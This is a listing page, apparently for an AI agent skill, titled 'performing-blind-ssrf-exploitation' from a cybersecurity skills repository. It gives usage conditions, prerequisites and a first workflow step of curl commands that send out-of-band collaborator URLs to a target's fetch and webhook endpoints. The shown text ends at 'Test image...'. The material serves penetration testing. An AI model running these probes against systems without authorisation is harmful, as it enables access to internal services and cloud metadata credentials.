performing-blind-ssrf-exploitation

Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.

AI & Automation 12,642 stars 1468 forks Updated today Apache-2.0

Quality Score: 99/100

- Stars (20%): 100
- Recency (20%): 100
- Frontmatter (20%): 70
- Documentation (15%): 100
- Issue Health (10%): 50
- License (10%): 100
- Description (5%): 100

Skill Content

# Performing Blind SSRF Exploitation

## When to Use

- When testing URL/webhook input parameters where server-side responses are not reflected
- During assessment of applications that fetch external resources (avatars, previews, imports)
- When testing PDF generators, image processors, or document converters for SSRF
- During cloud security assessments to detect metadata endpoint access
- When evaluating webhook functionality and URL validation implementations

## Prerequisites

- Burp Suite Professional with Burp Collaborator for OOB detection
- interact.sh or webhook.site for external callback monitoring
- Understanding of SSRF attack vectors and internal network enumeration
- Knowledge of cloud metadata endpoints (AWS, GCP, Azure)
- VPS or controlled server for advanced exploitation callback handling
- Python with requests library for automation scripts

## Workflow

### Step 1 — Identify Blind SSRF Input Points

```bash
# Common SSRF-susceptible parameters:
# url=, uri=, path=, dest=, redirect=, src=, source=
# link=, imageURL=, callback=, webhook=, feed=, import=

# Test URL fetch functionality
curl -X POST http://target.com/api/fetch-url \
  -H "Content-Type: application/json" \
  -d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'

# Test webhook configuration
curl -X POST http://target.com/api/webhooks \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'

# Test image...
```

Details

- Author: mukul975
- Repository: mukul975/Anthropic-Cybersecurity-Skills
- Created: 3 months ago
- Last Updated: today
- Language: Python
- License: Apache-2.0
